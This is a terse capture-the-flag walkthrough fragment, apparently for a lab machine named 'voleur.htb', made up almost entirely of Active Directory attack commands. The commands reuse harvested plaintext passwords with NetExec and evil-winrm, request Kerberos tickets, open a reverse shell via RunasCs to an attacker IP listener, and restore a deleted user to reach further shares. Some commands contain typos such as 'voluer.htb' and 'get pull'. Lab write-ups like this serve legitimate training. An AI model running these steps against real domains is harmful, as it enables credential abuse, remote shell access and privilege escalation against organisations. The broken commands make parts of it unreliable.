nxc winrm dc.voleur.htb -u svc_winrm -p 'AFireInsidedeOzarctica98019afi'- Connect using kerberos ticket with getTGT.py that uses a valid user’s NTLM hash to request Kerberos tickets, in order to access any service where user has permissions.
getTGT.py 'voleur.htb/svc_winrm:AFireInsidedeOzarctica98019afi'
KRB5CCNAME=svc_winrm.ccache evil-winrm -i dc.voluer.htb -r voleur.htb- Use RunasCS to gain a reverse shell as SVC_LDAP executing in the winrm session.
.\runascs.exe svc_ldap M1XyC9pW7qT5Vn powershell.exe -r 10.10.14.8:9001
rlwrap nc -nvlp 9001
- AD Powershell Module to restore a deleted user
Get-ADObject -filter 'isDeleted -eq $true' -IncludeDeletedObjects
Get-ADObject -filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects
Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db- Validate restored user access, password we found in spreadsheet on share.
nxc smb dc.voleur.htb -u todd.wolfe -p 'NightT1meP1dg3on14' -k
- Alternative: ldapsearch can see deleted users
getTGT.py 'voleur.htb/svc_ldap:M1XyC9pW7qT5Vn'
KRB5CCNAME=svc_ldap.ccache ldapsearch -H ldap://dc.voluer.htb -Tx -Y GSSAPI -b "CN=Deleted Objects,DC=voluer,DC=htb" -E '!1.2.840.113556.1.4.417'
- Tombstone nxc module and force ldap to stay insecure as ldaps have no certificate installed on target DC. netexec module allows users to list and restore objects from "Deleted Objects" container
sudo apt install python3-gssapi
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec/
git config pull.rebase true
get pull origin pull/736/head
nxc ldap dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k -M tombstone -o ACTION=query
nxc ldap dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k -M tombstone -o ACTION=restore ID=1c6b1deb-c372-4cbb-87b1-15031de169db SCHEME=ldap
- Restored user Todd.Wolfe is a member of second-line technician. Looking at the fileshare to discover his user backup
nxc smb dc.voleur.htb -u todd.wolfe -p 'NightT1meP1dg3on14' -k